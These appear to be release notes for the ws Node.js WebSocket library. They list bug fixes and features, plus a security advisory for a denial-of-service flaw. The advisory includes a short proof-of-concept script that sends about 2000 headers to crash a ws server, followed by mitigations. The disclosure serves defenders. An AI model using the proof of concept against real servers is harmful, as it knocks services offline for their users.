Bug fixes

• Fixed a spec violation where the Sec-WebSocket-Version header was not added
  to the HTTP response if the client requested version was either invalid or
  unacceptable (33f5dba).

Bug fixes

• Fixed an issue that, during message decompression when the maximum size was
  exceeded, led to the emission of an inaccurate error and closure of the
  connection with an improper close code (#2285).

Bug fixes

• The length of the UNIX domain socket paths in the tests has been shortened to
  make them work when run via CITGM (021f7b8).

Features

• Added support for Blob (#2229).

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;
    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';
  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });
  request.end();
});

The vulnerability was reported by Ryan LaPointe in #2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the
   --max-http-header-size=size and/or the maxHeaderSize options so
   that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

Bug fixes

• Backported e55e510 to the 7.x release line (22c2876).

Bug fixes

• Backported e55e510 to the 6.x release line (eeb76d3).

Bug fixes

• Backported e55e510 to the 5.x release line (4abd8f6).

Features

• The WebSocket constructor now accepts the createConnection option (#2219).

Other notable changes

• The default value of the allowSynchronousEvents option has been changed to
  true (#2221).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

Features

• Added the autoPong option (01ba54e).